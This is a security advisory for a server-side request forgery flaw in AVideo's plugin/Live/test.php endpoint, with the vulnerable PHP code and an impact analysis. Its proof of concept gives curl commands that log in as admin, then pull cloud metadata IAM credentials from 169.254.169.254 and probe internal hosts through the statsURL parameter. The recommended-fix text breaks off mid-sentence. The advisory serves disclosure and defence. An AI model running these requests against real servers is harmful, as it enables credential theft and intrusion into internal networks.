🛡️ GHSA-wxjx-r2j2-96fx — avideo

⚪ Unknown ✅ No Known Exploit CWE-918 OSV
N/A
CVSS Score
0 Low4 Medium7 High9 Critical10

Description

AVideo: Full-Read SSRF Through Unvalidated statsURL Parameter in plugin/Live/test.php

Summary

The plugin/Live/test.php endpoint accepts a URL via the statsURL parameter and fetches it server-side using file_get_contents(), curl_exec(), or wget, returning the full response content in the HTML output. The only validation is a trivial regex (/^http/) that does not block requests to internal/private IP ranges or cloud metadata endpoints. The codebase provides isSSRFSafeURL() which blocks private IPs and resolves DNS to prevent rebinding, but this endpoint does not call it. An authenticated admin can read responses from cloud metadata services, internal network services, and localhost endpoints.

Details

The vulnerable code path is in plugin/Live/test.php:

User input (line 11):

```php

$statsURL = $_REQUEST['statsURL'];

if (empty($statsURL) || $statsURL == "php://input" || !preg_match("/^http/", $statsURL)) {

_log('this is not a URL ');

exit;

}

```

The regex /^http/ only verifies the URL starts with "http" — it does not validate the host, resolve DNS, or check against private/reserved IP ranges.

Sink — file_get_contents (line 58-68):

```php

if (ini_get('allow_url_fopen')) {

try {

$tmp = file_get_contents($url, false, $context);

_log('file_get_contents:: '.htmlentities($tmp));

```

Sink — curl_exec (line 73-94):

```php

} elseif (function_exists('curl_init')) {

$ch = curl_init();

// ...

curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);

curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);

// ...

$output = curl_exec($ch);

// ...

_log('curl_init:: '.htmlentities($output));

```

Sink — wget (line 114):

```php

if (wget($url, $filename)) {

$result = file_get_contents($filename);

_log('wget:: '.htmlentities($result));

```

All three code paths output the full response content to the user via _log(), which echoes to the HTML response (line 155-160).

The codebase provides isSSRFSafeURL() at objects/functions.php:4025 which validates URL scheme, resolves DNS hostnames to IP addresses, and blocks private/reserved IP ranges (127.0.0.0/8, 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16, 169.254.0.0/16, and IPv6 equivalents). This function is used in 7 other endpoints including the previously-reported objects/aVideoEncoder.json.php, but plugin/Live/test.php does not call it.

Additionally, SSL certificate verification is disabled on both the file_get_contents stream context (lines 45-49) and the curl handler (lines 79-80), allowing MITM attacks against HTTPS targets.

The endpoint also lacks CSRF token validation while accepting GET requests via $_REQUEST, making it susceptible to cross-site request forgery against authenticated admins, although the CSRF-triggered variant is blind (attacker cannot read the response cross-origin).

PoC

Step 1: Authenticate as admin and obtain session cookie

```bash

# Login to obtain PHPSESSID

PHPSESSID=$(curl -s -c - 'https://target.com/objects/userLogin.json.php' \

-d 'user=admin&pass=adminpass' | grep PHPSESSID | awk '{print $7}')

```

Step 2: Read AWS cloud metadata (IAM credentials)

```bash

curl -b "PHPSESSID=${PHPSESSID}" \

'https://target.com/plugin/Live/test.php?statsURL=http://169.254.169.254/latest/meta-data/iam/security-credentials/'

```

Expected output: HTML page containing the full cloud metadata response including IAM role names.

Step 3: Read IAM credentials for a specific role

```bash

curl -b "PHPSESSID=${PHPSESSID}" \

'https://target.com/plugin/Live/test.php?statsURL=http://169.254.169.254/latest/meta-data/iam/security-credentials/MyRole'

```

Expected output: JSON containing AccessKeyId, SecretAccessKey, and Token for the IAM role.

Step 4: Scan internal services

```bash

curl -b "PHPSESSID=${PHPSESSID}" \

'https://target.com/plugin/Live/test.php?statsURL=http://192.168.1.1:8080/'

```

Expected output: Full response from internal service at 192.168.1.1:8080.

Impact

An authenticated admin can:

  • Read cloud metadata credentials: Access AWS/GCP/Azure instance metadata endpoints (169.254.169.254) to retrieve IAM credentials, instance identity tokens, and other sensitive cloud configuration.
  • Enumerate internal services: Probe internal network ranges (10.x, 172.16.x, 192.168.x) and localhost services to discover and read from services not exposed to the internet.
  • Port scan internal infrastructure: Determine which internal hosts and ports are active based on response timing and content.
  • Bypass network segmentation: Reach services behind firewalls that trust the AVideo server's IP address.

The full response disclosure (not blind) makes this a high-confidentiality-impact finding. The admin authentication requirement limits the attack surface but does not eliminate it — compromised admin accounts, insider threats, and the lack of CSRF protection all provide attack vectors.

Recommended Fix

Add isSSRFSafeURL() vali

How this vulnerability can be exploited

This issue can be reached over the network, attack complexity is low, an attacker needs administrative privileges on the target. No user interaction is required. The scope is unchanged, so the impact stays within the vulnerable component. Rated impact: confidentiality high, integrity none, availability none.

Weakness class

GHSA-wxjx-r2j2-96fx is classified as CWE-918: Server-Side Request Forgery (SSRF). The server fetches a URL supplied by the caller, which can be pointed at internal systems it alone can reach.

Affected software

GHSA-wxjx-r2j2-96fx is recorded against 1 package.

  • wwbn/avideo

Timeline and source

Published on 25 March 2026. No public exploit is currently recorded for this entry. Record sourced from OSV.

References

github.com (Web)
github.com (Web)
github.com (Package)

Details

Severity Unknown
CVSS Score N/A
CVSS Vector CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
CWE CWE-918
Public Exploit ✅ No
Source OSV
Published 2026-03-25
Updated 2026-08-20
Modified 2026-03-25
Fix URL N/A

Affected Packages

Software From version Fixed in
wwbn/avideo

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